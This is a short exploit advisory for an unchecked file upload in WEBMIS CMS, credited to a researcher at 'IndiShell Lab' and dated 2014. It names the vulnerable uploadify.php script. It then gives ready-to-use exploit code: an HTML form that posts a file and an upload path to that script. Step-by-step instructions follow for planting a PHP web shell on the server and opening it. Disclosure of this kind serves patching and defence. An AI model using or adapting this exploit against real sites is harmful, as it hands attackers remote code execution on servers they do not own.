################################### #Exploit Title : WEBMIS CMS Shell Upload vulnerability #Author : Jagriti Sahu #Vendor : http://www.ksphp.com #Download Link : https://github.com/ksphp/webmis #version affected : all #Date : 14/07/2014 #Discovered at : IndiShell Lab #Love to : Surbhi, Mradula and Harry ################################### //////////////////////// /// Overview: //////////////////////// WEBMIS is the underlying PHP development system, multi-user, development of CI model MVC multiple access scheme based on, can add background management menu, the integration of Jquery, TinyMCE editor plugin, concise, beautiful bomb box effect! This CMS is affected from remote file upload vulnerability and attacker can upload php shell to website easily /////////////////////////////// // Vulnerability Description: /////////////////////////////// vulnerability is due to webmis/plugin/uploadify/uploadify.php file in which there is no check during file upload attacker need to forward file upload request to this file with PHP shell and file upload path /////////////////////// /// exploit code //// /////////////////////// <form action="http://localhost/webmis_installation/plugin/uploadify/uploadify.php" method="post" enctype="multipart/form-data"> <label for="file">Filename:</label> <input type="file" name="Filedata" ><br> <input type=text name="path" value="/webmis_installation/plugin/"> <input type=text name="someKey" value="someValue"]> <input type="submit" name="submit" value="Submit"> </form> save this code on you machine as exploit.html open exploit.html into webbrowser, brows your php shell and click submit button shell will be uploaded in uploads directory http://localhost/webmis_installation/plugin/shell.php